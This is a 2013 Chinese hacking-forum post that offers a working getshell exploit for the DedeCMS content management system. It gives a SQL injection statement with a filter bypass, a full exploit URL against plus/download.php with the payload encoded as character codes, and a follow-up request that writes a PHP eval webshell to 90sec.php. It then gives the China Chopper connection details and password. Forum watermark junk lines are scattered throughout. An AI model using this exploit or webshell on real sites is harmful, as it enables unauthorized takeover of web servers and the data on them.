中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
2 h$ n5 d: ^$ s, o* R+ _+ |" b3 F
2 l" C0 n/ w. n# F; g
# f! {( C2 n$ d" s/ A
作者:鬼哥
% {# c% m' O; P
" Z u6 s3 l( h ~. q- i: L
看贴不回,没JJ
! Q! x) a$ w% w2 g! \
! b( j, D k8 f( p6 Y
漏洞大家都知道是哪个。
! c I8 N/ D8 Z3 r7 f0 K% T* w+ A
2 H- D, v1 _) |/ ~# e% P
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
' Z) |% s" }& d; C0 \8 f0 O w9 I
6 I6 ^# g, o! N) F7 z
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
M2 w' n$ j# f& C; t o
) r. v' W/ u* }% t/ _, p" I
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
6 s8 {2 j) a7 ^3 u/ N1 c( `) d) p( N
7 q/ T9 q7 l% e. s
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
$ v4 t, {! s* y2 G/ S/ C7 d
, E! I, B- _. @0 `! S# G
但是测试了下。。失败
+ z7 J8 [6 y- V; M
+ N$ n; C" `, G5 P
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
: V- X3 y" m6 x; P7 N4 s* ]- F
: H' m: ?) f+ W- y" B
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
2 }3 o6 n/ C1 k' e. c
. \( T4 f8 l' I B& m8 l
EXP:
5 D7 w9 h( x4 {7 [
8 T5 v/ `+ I3 B2 z# p4 D
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
* u5 t: Q4 l+ x* D) R1 W# @3 _
% d' ~! T, h7 I
7 l5 S8 y% I& {9 b9 v
成功增加。
G) H5 O; \$ B2 M6 ~
: T5 c* g- K. i _' {
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
' E! n! Q6 P9 o# I# ~9 p) F
生成一句话木马.
1 r+ c! I4 S$ w
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
1 d3 H ]( M- C. a( c
) F# D) H% Y/ S2 C% f$ Y. I; ^
测试OK。
% K# W" R- k0 ?
4 a- @+ v9 U1 w: }# L% j- e: q* x
- U5 s4 }" ^" A2 x2 L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2